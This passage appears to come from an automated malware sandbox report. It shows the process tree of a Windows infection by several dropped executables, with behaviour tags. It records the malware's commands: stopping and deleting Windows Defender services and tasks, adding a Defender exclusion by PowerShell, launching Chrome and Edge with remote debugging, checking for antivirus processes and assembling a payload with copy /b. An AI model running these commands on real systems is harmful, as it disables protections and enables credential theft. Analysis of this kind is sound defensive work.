                                            PID:5844
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                            8⤵
                                              PID:1704
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecWfp"
                                              8⤵
                                              • Launches sc.exe
                                              PID:3640
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecWfp"
                                              8⤵
                                              • Launches sc.exe
                                              PID:456
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                              8⤵
                                                PID:1504
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecFlt"
                                                8⤵
                                                • Launches sc.exe
                                                PID:3472
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecFlt"
                                                8⤵
                                                • Launches sc.exe
                                                PID:5748
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                8⤵
                                                  PID:5536
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecCore"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:4472
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecCore"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:3616
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                  8⤵
                                                    PID:1176
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                    8⤵
                                                      PID:2448
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                      8⤵
                                                        PID:5776
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                        8⤵
                                                          PID:2360
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                          8⤵
                                                            PID:3460
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop ddrver
                                                            8⤵
                                                            • Launches sc.exe
                                                            PID:4468
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete ddrver
                                                            8⤵
                                                            • Launches sc.exe
                                                            PID:1692
                                                • C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"
                                                  3⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1552
                                                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                    4⤵
                                                    • Downloads MZ/PE file
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1508
                                                    • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5580
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Checks processor information in registry
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:6108
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                          7⤵
                                                          • Uses browser remote debugging
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:1176
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8c5b0dcf8,0x7ff8c5b0dd04,0x7ff8c5b0dd10
                                                            8⤵
                                                              PID:5872
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2020 /prefetch:2
                                                              8⤵
                                                                PID:2856
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2264 /prefetch:3
                                                                8⤵
                                                                  PID:1944
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2572 /prefetch:8
                                                                  8⤵
                                                                    PID:2328
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3268 /prefetch:1
                                                                    8⤵
                                                                    • Uses browser remote debugging
                                                                    PID:1744
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3316 /prefetch:1
                                                                    8⤵
                                                                    • Uses browser remote debugging
                                                                    PID:684
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4296,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4320 /prefetch:2
                                                                    8⤵
                                                                    • Uses browser remote debugging
                                                                    PID:4640
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4748,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4736 /prefetch:1
                                                                    8⤵
                                                                    • Uses browser remote debugging
                                                                    PID:4748
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5360,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5376 /prefetch:8
                                                                    8⤵
                                                                      PID:5052
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5452 /prefetch:8
                                                                      8⤵
                                                                        PID:2956
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5372,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5564 /prefetch:8
                                                                        8⤵
                                                                          PID:4976
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5548 /prefetch:8
                                                                          8⤵
                                                                            PID:852
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5488 /prefetch:8
                                                                            8⤵
                                                                              PID:4828
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4600,i,16976368015061607896,8123941699668448954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5516 /prefetch:8
                                                                              8⤵
                                                                                PID:5448
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                              7⤵
                                                                              • Uses browser remote debugging
                                                                              • Enumerates system info in registry
                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:2520
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ff8c5aef208,0x7ff8c5aef214,0x7ff8c5aef220
                                                                                8⤵
                                                                                  PID:5320
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:3
                                                                                  8⤵
                                                                                    PID:5800
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2648,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:2
                                                                                    8⤵
                                                                                      PID:5560
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2180,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=2764 /prefetch:8
                                                                                      8⤵
                                                                                        PID:4932
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3596,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
                                                                                        8⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:3556
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3604,i,17371351328959267760,12643861452618195169,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
                                                                                        8⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:380
                                                                                    • C:\ProgramData\5xtr16xtri.exe
                                                                                      "C:\ProgramData\5xtr16xtri.exe"
                                                                                      7⤵
                                                                                        PID:6152
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          8⤵
                                                                                            PID:6172
                                                                                        • C:\ProgramData\h47ymoppph.exe
                                                                                          "C:\ProgramData\h47ymoppph.exe"
                                                                                          7⤵
                                                                                            PID:6496
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              8⤵
                                                                                                PID:6620
                                                                                                • C:\Users\Admin\AppData\Roaming\NBTNwioDyA.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\NBTNwioDyA.exe"
                                                                                                  9⤵
                                                                                                    PID:6704
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                      10⤵
                                                                                                        PID:3772
                                                                                                    • C:\Users\Admin\AppData\Roaming\3LgWs99XJN.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\3LgWs99XJN.exe"
                                                                                                      9⤵
                                                                                                        PID:6784
                                                                                                  • C:\ProgramData\8y58gl689h.exe
                                                                                                    "C:\ProgramData\8y58gl689h.exe"
                                                                                                    7⤵
                                                                                                      PID:6608
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe 0
                                                                                                        8⤵
                                                                                                          PID:6584
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\3kaiNMY0vTJaO8gw.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\3kaiNMY0vTJaO8gw.exe 6584
                                                                                                            9⤵
                                                                                                              PID:1372
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 1008
                                                                                                                10⤵
                                                                                                                • Program crash
                                                                                                                PID:17020
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\29g3RGhE\Wshieaw4ZXQNf5DY.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\29g3RGhE\Wshieaw4ZXQNf5DY.exe 0
                                                                                                              9⤵
                                                                                                                PID:6264
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                  10⤵
                                                                                                                    PID:5260
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kr3KzjrL19f1UM2N.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kr3KzjrL19f1UM2N.exe 6584
                                                                                                                  9⤵
                                                                                                                    PID:20384
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 20384 -s 628
                                                                                                                      10⤵
                                                                                                                      • Program crash
                                                                                                                      PID:24128
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\zua1n" & exit
                                                                                                                7⤵
                                                                                                                  PID:1952
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 11
                                                                                                                    8⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:528
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5812
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                6⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:3328
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3108
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                6⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5968
                                                                                                              • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5680
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3836
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5852
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                6⤵
                                                                                                                  PID:1028
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                  6⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4136
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10046340101\427e1a688b.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10046340101\427e1a688b.exe"
                                                                                                                5⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in Windows directory
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4608
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                                                                  6⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3608
                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                    tasklist
                                                                                                                    7⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4192
                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                    findstr /I "opssvc wrsa"
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:452
                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                    tasklist
                                                                                                                    7⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4896
                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4556
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c md 674187
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1368
                                                                                                                  • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                    extrac32 /Y /E Funky.wbk
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1552
                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                    findstr /V "Und" Tournament
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4604
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:380
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2384
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
                                                                                                                    Constraints.com r
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:1496
                                                                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                                                                    choice /d y /t 5
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5448
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4136
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                  6⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:1500
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10049500101\bfbdc8a175.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10049500101\bfbdc8a175.exe"
                                                                                                                5⤵
                                                                                                                  PID:2876
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10049500101\bfbdc8a175.exe"
                                                                                                                    6⤵
                                                                                                                      PID:6360
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10049510101\43facf6a37.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10049510101\43facf6a37.exe"
                                                                                                                    5⤵
                                                                                                                      PID:208
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10049510101\43facf6a37.exe"
                                                                                                                        6⤵
                                                                                                                          PID:12548
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427820101\25803510b2.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427820101\25803510b2.exe"
                                                                                                                    3⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5228
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10427820101\25803510b2.exe"
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:868
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427830101\a9048da77e.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427830101\a9048da77e.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4184
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:740
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427840101\40e05db4e7.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427840101\40e05db4e7.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:932
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427850101\a3f39ef5ef.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427850101\a3f39ef5ef.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2440
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427860101\7a76898fa2.exe
